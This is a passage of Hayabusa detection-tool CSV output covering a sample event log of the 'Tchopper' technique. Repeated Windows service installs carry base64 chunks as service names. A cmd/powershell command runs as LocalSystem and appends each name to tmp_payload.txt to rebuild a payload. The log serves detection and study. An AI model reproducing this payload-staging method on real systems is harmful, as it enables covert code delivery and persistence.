start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:05.817 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 